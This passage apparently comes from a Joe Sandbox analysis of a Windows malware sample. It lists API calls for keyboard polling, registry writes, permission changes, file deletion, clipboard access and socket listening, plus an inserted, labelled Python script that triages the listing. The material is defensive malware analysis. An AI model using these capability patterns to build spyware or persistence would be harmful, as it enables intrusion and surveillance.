                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 5d80d4ce0ab07fc8d85421ca422347bdca7deb95fdb928b8db5904e1277a4aa4
                                                            • Instruction ID: 6f91cf14f96107c81a447272091b515ec35894dfe5bf4e60c6bb56be2b917d1d
                                                            • Opcode Fuzzy Hash: 5d80d4ce0ab07fc8d85421ca422347bdca7deb95fdb928b8db5904e1277a4aa4
                                                            • Instruction Fuzzy Hash: 3C615771900619ABDF109FA5DD89EFEBBB9FF04700F148129FA15A62A1DB319A05CB60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$PJ$$UCP)$UTF)$UTF16)
                                                            • API String ID: 0-3620513318
                                                            • Opcode ID: 9f5656de31c905a9924d3f0013d422f32fcdfddd3a5ab915927dcc02a311e2a3
                                                            • Instruction ID: b2c288b2b89d4cd1b07edad9bc8b32994ac7ca5c92b412cfc6dadbfd0232543c
                                                            • Opcode Fuzzy Hash: 9f5656de31c905a9924d3f0013d422f32fcdfddd3a5ab915927dcc02a311e2a3
                                                            • Instruction Fuzzy Hash: 11727C75E00219DBDB28CF98C8807FEB7B5FF58710F15816AE949EB290DB749981CB90
                                                            APIs
                                                              • Part of subcall function 002210A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00220038,?,?), ref: 002210BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00220737
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002207D6
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0022086E
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00220AAD
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00220ABA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: e853f7653573061eec8316a668d34f1e0737c0c087c8e79fee6f4a3839b6a969
                                                            • Instruction ID: 6b3ca282e4699ab529c346794e734fbbc44ed0f5ae93d01849d210e85a662835
                                                            • Opcode Fuzzy Hash: e853f7653573061eec8316a668d34f1e0737c0c087c8e79fee6f4a3839b6a969
                                                            • Instruction Fuzzy Hash: CDE16C31214211AFCB14DF64D885E6BBBF4EF89714B04886DF94ADB2A2DB30ED51CB51
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00200241
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 002002C2
                                                            • GetKeyState.USER32(000000A0), ref: 002002DD
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 002002F7
                                                            • GetKeyState.USER32(000000A1), ref: 0020030C
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00200324
                                                            • GetKeyState.USER32(00000011), ref: 00200336
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0020034E
                                                            • GetKeyState.USER32(00000012), ref: 00200360
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00200378
                                                            • GetKeyState.USER32(0000005B), ref: 0020038A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 7072e6a7c10a19d7175ee0820baecdc8627170c13fd6e6bd0e4ad25531f2515f
                                                            • Instruction ID: 37f2945289aaff41f6ede2391d6559aae8e8e6f0a6c2b43c584ea9ad6d954fdd
                                                            • Opcode Fuzzy Hash: 7072e6a7c10a19d7175ee0820baecdc8627170c13fd6e6bd0e4ad25531f2515f
                                                            • Instruction Fuzzy Hash: 2D41CB345247CB6EFF724FA494883B5BEA0AF12340F4841DDD9C5461C3DB945DE48792
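The entries in this listing are raw per-function API call records, and reading hundreds of them by hand is slow. The following triage helper is an added example, not part of the Joe Sandbox report or of its IDA plugin: it parses the bullet lines in exactly the form shown above (`API.MODULE(args), ref: ADDR`, with or without the `Part of subcall function` prefix), groups each function by a small set of capability clusters, and decodes the literal virtual-key arguments that GetAsyncKeyState/GetKeyState are called with (0xA0/0xA1 are the left/right shift keys, 0x11 is Control, 0x12 is Alt, 0x5B is the left Windows key). The capability groupings and the `SAMPLE_LISTING` excerpt are constructed for this example and are not Joe Sandbox signature logic. One caveat for anyone using such tags: the image at 001A0000 is the sample's main module, and the PCRE option strings, REG_* type names and modifier-key checks in these entries are what one expects from an interpreter runtime such as AutoIt's, so a tag here says what the code can do, not what the embedded script or the injected payload actually does.

```python
import re
from collections import namedtuple

# Constructed excerpt: three abbreviated entries in the format of the listing above
# (not a complete function list). The bullet character is U+2022.
SAMPLE_LISTING = """\
APIs
• GetKeyboardState.USER32(?), ref: 00200241
• GetAsyncKeyState.USER32(000000A0), ref: 002002C2
• GetKeyState.USER32(000000A0), ref: 002002DD
• GetAsyncKeyState.USER32(00000011), ref: 00200324
• Opcode ID: 7072e6a7c10a19d7175ee0820baecdc8627170c13fd6e6bd0e4ad25531f2515f
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00220BDE
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0022F910,00000000,?,00000000,?,?), ref: 00220C4C
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00220D1D
• RegCloseKey.ADVAPI32(00000000), ref: 0022104A
• Opcode ID: 04465f4ced372fb1bdc7ef55f3e5537afb5aa8a1220e20dab9b6cf9f2909b577
APIs
  • Part of subcall function 001F874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001F8766
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001F825B
• _memset.LIBCMT ref: 001F8270
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001F82F9
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001F83AB
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 001F83BF
• Opcode ID: 5d80d4ce0ab07fc8d85421ca422347bdca7deb95fdb928b8db5904e1277a4aa4
"""

Call = namedtuple("Call", "api module args ref via_subcall")

# One bullet line. The argument list is absent for LIBCMT entries and may hold
# literals such as *.* or -00000008, so anything up to the closing paren is taken.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
OPCODE_RE = re.compile(r"^\s*•\s*Opcode ID:\s*(?P<id>[0-9a-f]+)\s*$")

# Capability clusters: this example's own heuristic, not Joe Sandbox's signatures.
CAPABILITIES = {
    "keyboard_state_polling": {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"},
    "registry_write": {"RegCreateKeyExW", "RegSetValueExW"},
    "registry_read": {"RegQueryValueExW"},
    "dacl_modification": {"AddAce", "SetSecurityDescriptorDacl", "SetUserObjectSecurity"},
    "file_enumeration": {"FindFirstFileW", "FindNextFileW"},
    "file_delete_or_move": {"DeleteFileW", "MoveFileW"},
    "clipboard_access": {"OpenClipboard", "GetClipboardData", "SetClipboardData"},
}

# Virtual-key constants that appear as literal arguments to the key-state APIs.
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0x5C: "VK_RWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
            0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}


def parse_entries(listing):
    """Split the listing at each 'APIs' header into per-function entries."""
    entries, current = [], None
    for line in listing.splitlines():
        if line.strip() == "APIs":
            current = {"opcode_id": None, "calls": []}
            entries.append(current)
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw is not None else []
            current["calls"].append(Call(m.group("api"), m.group("mod"), args,
                                         m.group("ref"), m.group("sub") is not None))
            continue
        m = OPCODE_RE.match(line)
        if m:
            current["opcode_id"] = m.group("id")
    return entries


def decode_vk(call):
    """Return the VK_* name for a literal key-code argument, or None for '?'/unknown."""
    if call.api not in ("GetAsyncKeyState", "GetKeyState") or not call.args:
        return None
    try:
        return VK_NAMES.get(int(call.args[0], 16))
    except ValueError:  # placeholder argument such as "?"
        return None


def triage(listing):
    """Tag every function entry with capability clusters and decoded key constants."""
    report = []
    for entry in parse_entries(listing):
        apis = {c.api for c in entry["calls"]}
        report.append({
            "opcode_id": entry["opcode_id"],
            "apis": sorted(apis),
            "tags": sorted(t for t, needles in CAPABILITIES.items() if apis & needles),
            "decoded_keys": sorted({k for k in map(decode_vk, entry["calls"]) if k}),
            "subcall_apis": sorted(c.api for c in entry["calls"] if c.via_subcall),
        })
    return report


if __name__ == "__main__":
    for r in triage(SAMPLE_LISTING):
        print(r["opcode_id"][:12], r["tags"], r["decoded_keys"], r["subcall_apis"])
```

Feeding the full listing through `triage` yields one record per function keyed by its Opcode ID, which is stable across re-analysis of the same binary, so the tags can be diffed between sandbox runs or across related samples. Calls reached only through `Part of subcall function` are kept but reported separately, since they describe a callee and not the function the entry belongs to.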
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: 03e8a97d468c99a378815e9ddd1138bc38e710a6d5c8295b3551778812d4779f
                                                            • Instruction ID: 8e073a531b29712f86e7d56d2be44c8b0a4946698942866f2d7842a1807c6a13
                                                            • Opcode Fuzzy Hash: 03e8a97d468c99a378815e9ddd1138bc38e710a6d5c8295b3551778812d4779f
                                                            • Instruction Fuzzy Hash: 53218D35210221AFDB20AF60ED0DB6E77B8EF24714F10806AF94ADB2B1DB74AD41CB54
                                                            APIs
                                                              • Part of subcall function 001A48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001A48A1,?,?,001A37C0,?), ref: 001A48CE
                                                              • Part of subcall function 00204CD3: GetFileAttributesW.KERNEL32(?,00203947), ref: 00204CD4
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00203ADF
                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00203B87
                                                            • MoveFileW.KERNEL32(?,?), ref: 00203B9A
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00203BB7
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00203BD9
                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00203BF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4002782344-1173974218
                                                            • Opcode ID: 9f4073acde6b1d25a02466dfc3d9744628434e0918322c0aceafdf1cafb73abd
                                                            • Instruction ID: dafa0ad027064c4d8f4c39c483af831f7c317a619ec6d4beeb66b0c89c1eec57
                                                            • Opcode Fuzzy Hash: 9f4073acde6b1d25a02466dfc3d9744628434e0918322c0aceafdf1cafb73abd
                                                            • Instruction Fuzzy Hash: 79519035905249AACF15EBE0DE928EDB779AF25304F2441A9E402B70D2EF306F09CB60
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0020F6AB
                                                            • Sleep.KERNEL32(0000000A), ref: 0020F6DB
                                                            • _wcscmp.LIBCMT ref: 0020F6EF
                                                            • _wcscmp.LIBCMT ref: 0020F70A
                                                            • FindNextFileW.KERNEL32(?,?), ref: 0020F7A8
                                                            • FindClose.KERNEL32(00000000), ref: 0020F7BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
                                                            • API String ID: 713712311-438819550
                                                            • Opcode ID: 15341d6b49be80600842be4d42757df9d0d8163e5da4a8158371fee3e627d80e
                                                            • Instruction ID: 94fb7588f1e718801309a1a9dc9a034d06a19e75919910c12a5b7c7e685ef9ff
                                                            • Opcode Fuzzy Hash: 15341d6b49be80600842be4d42757df9d0d8163e5da4a8158371fee3e627d80e
                                                            • Instruction Fuzzy Hash: DB41AE7595020AAFCF61DFA4CD49AEEBBB8FF15310F104166E814A31E1EB309E54CB91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                            • API String ID: 0-1546025612
                                                            • Opcode ID: 4f538388386a017a5a8bba94e0e9f37671bc94483c54cbb0eed22e5b9d86c684
                                                            • Instruction ID: b9c975054c205314723343c73c701751c9ef925ce45e9c7e326e7bf466a85dd1
                                                            • Opcode Fuzzy Hash: 4f538388386a017a5a8bba94e0e9f37671bc94483c54cbb0eed22e5b9d86c684
                                                            • Instruction Fuzzy Hash: 4AA28D70E0465ACBDF28CF59C9907FDB7B1BF55314F2581AAE85AA7281E7309E81CB40
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 6cc8d43d5fe1261b96107d792442d15a7c40748ea3469cb795439f9fef786724
                                                            • Instruction ID: 641cb5fece644da4397264c362f027daa41bae3c697f23bdbda8aa7a39bcd03d
                                                            • Opcode Fuzzy Hash: 6cc8d43d5fe1261b96107d792442d15a7c40748ea3469cb795439f9fef786724
                                                            • Instruction Fuzzy Hash: B7128A70A00609EFDF15DFA4D985AEEB7F6FF58300F108569E806A7291EB35AE11CB50
                                                            APIs
                                                              • Part of subcall function 001F8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001F8D0D
                                                              • Part of subcall function 001F8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001F8D3A
                                                              • Part of subcall function 001F8CC3: GetLastError.KERNEL32 ref: 001F8D47
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0020549B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            • Opcode ID: eb2ffd03e50b90e950bb3d3a58446d629edd7e1376bc9f09bb146b1a27138bd6
                                                            • Instruction ID: ed7112de7be04505e6fa13094c6695a81b72ddb8bf7f61bbd0b3c7fee753c5f6
                                                            • Opcode Fuzzy Hash: eb2ffd03e50b90e950bb3d3a58446d629edd7e1376bc9f09bb146b1a27138bd6
                                                            • Instruction Fuzzy Hash: D6012431674B266AE7786E74AC4ABFB7268EB05342F200530FD06D20D3DAA00CA089A0
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002165EF
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002165FE
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 0021661A
                                                            • listen.WSOCK32(00000000,00000005), ref: 00216629
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00216643
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00216657
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: 009c7f8fc820871505ff82dcbbb8e17727b22359d65c502391619612dac33078
                                                            • Instruction ID: 618513ac9990d1e1ab24beeb02521017b63e0031edfc7b4be821e3798885f5a7
                                                            • Opcode Fuzzy Hash: 009c7f8fc820871505ff82dcbbb8e17727b22359d65c502391619612dac33078
                                                            • Instruction Fuzzy Hash: 2721D035200205AFCB10EF64D989B6EB7F9EF59320F108169E916E73E1CB70AD81CB51
                                                            APIs
                                                              • Part of subcall function 001C0FF6: std::exception::exception.LIBCMT ref: 001C102C
                                                              • Part of subcall function 001C0FF6: __CxxThrowException@8.LIBCMT ref: 001C1041
                                                            • _memmove.LIBCMT ref: 001F062F
                                                            • _memmove.LIBCMT ref: 001F0744
                                                            • _memmove.LIBCMT ref: 001F07EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            • Opcode ID: dfc94da80952d2c0dda43e2e5529149d274b1fd13b190ef4b8d23e1b1828122d
                                                            • Instruction ID: dfa6ae31f0afafa7c714ee263d36a9021c14ccd7d4d632832b2ec0eb82efe716
                                                            • Opcode Fuzzy Hash: dfc94da80952d2c0dda43e2e5529149d274b1fd13b190ef4b8d23e1b1828122d
                                                            • Instruction Fuzzy Hash: CA0291B0E00209DFDF05DF64D981ABEBBB5EF58300F1580A9E806DB256EB31DA51CB91
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 001A19FA
                                                            • GetSysColor.USER32(0000000F), ref: 001A1A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 001A1A61
                                                              • Part of subcall function 001A1290: DefDlgProcW.USER32(?,00000020,?), ref: 001A12D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            • Opcode ID: 312dc18b5ceb5ee634673d36e8d6efa54f81c989360587568ada201cfa83d233
                                                            • Instruction ID: a4b8dcfbe117c2e58863038a56ed8c17c921ce3a60784c5b91a775b9dfb48400
                                                            • Opcode Fuzzy Hash: 312dc18b5ceb5ee634673d36e8d6efa54f81c989360587568ada201cfa83d233
                                                            • Instruction Fuzzy Hash: 90A17979119594FAD63CAB686C88DBF359DEB43355F26021BF403D7291CF248D11D2B2
                                                            APIs
                                                              • Part of subcall function 002180A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002180CB
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00216AB1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00216ADA
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00216B13
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00216B20
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00216B34
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            • Opcode ID: 2d8c31020f1ea649008d9461956e65ef75a72121e6ef695efc761845562ed0c8
